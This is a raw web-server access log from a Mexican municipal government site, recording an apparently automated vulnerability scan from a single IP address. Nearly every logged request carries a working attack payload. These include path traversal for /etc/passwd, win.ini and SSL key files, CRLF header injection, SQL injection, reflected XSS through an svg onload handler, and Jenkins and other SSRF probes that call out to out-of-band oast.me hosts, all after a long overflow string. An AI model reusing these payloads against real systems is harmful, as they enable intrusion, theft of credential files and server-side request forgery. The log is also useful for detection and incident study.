AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://cudo29mjalo72u293ingecqxghrg8mrzo.oast.me/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:39 -0600] "GET /api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:40 -0600] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:40 -0600] "GET /../../../../../../../../windows/win.ini HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:02:00 -0600] "GET /+CSCOE+/session_password.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:41 -0600] "GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:43 -0600] "POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:44 -0600] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cudo29mjalo72u293ingq9t8batigr9no.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:45 -0600] "GET /api/settings/values HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:49 -0600] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:18:54 -0600] "GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:44 -0600] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:46 -0600] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:47 -0600] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:19:56 -0600] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:00 -0600] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:06 -0600] "GET /fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:22:20:14 -0600] "GET /fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128